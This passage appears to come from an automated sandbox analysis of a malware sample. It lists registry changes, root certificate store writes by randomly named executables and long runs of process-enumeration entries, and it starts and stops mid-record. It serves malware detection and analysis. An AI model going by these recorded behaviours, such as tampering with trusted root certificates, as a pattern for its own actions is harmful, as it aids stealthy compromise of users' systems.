WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe -
Modifies registry class 8 IoCs
Processes:
Calculator.exeCalculator.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{2EE76738-1031-4187-8636-F32983D4BBD5} Calculator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{FE30FAB0-EBA6-4B92-A2AB-F5DF9A177A7F} Calculator.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ -
Processes:
aBgveQvYXSWQgZEuLsY6B7w_.exeinstaller.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f aBgveQvYXSWQgZEuLsY6B7w_.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 5c00000001000000040000000008000004000000010000001000000091de0625abdafd32170cbb25172a84670300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877619000000010000001000000063664b080559a094d10f0a3c5f4f629020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f aBgveQvYXSWQgZEuLsY6B7w_.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 aBgveQvYXSWQgZEuLsY6B7w_.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f aBgveQvYXSWQgZEuLsY6B7w_.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee404000000010000001000000091de0625abdafd32170cbb25172a846720000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f aBgveQvYXSWQgZEuLsY6B7w_.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exeOuvwjy_89uDNL70EEFA2qHL5.exepid process 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 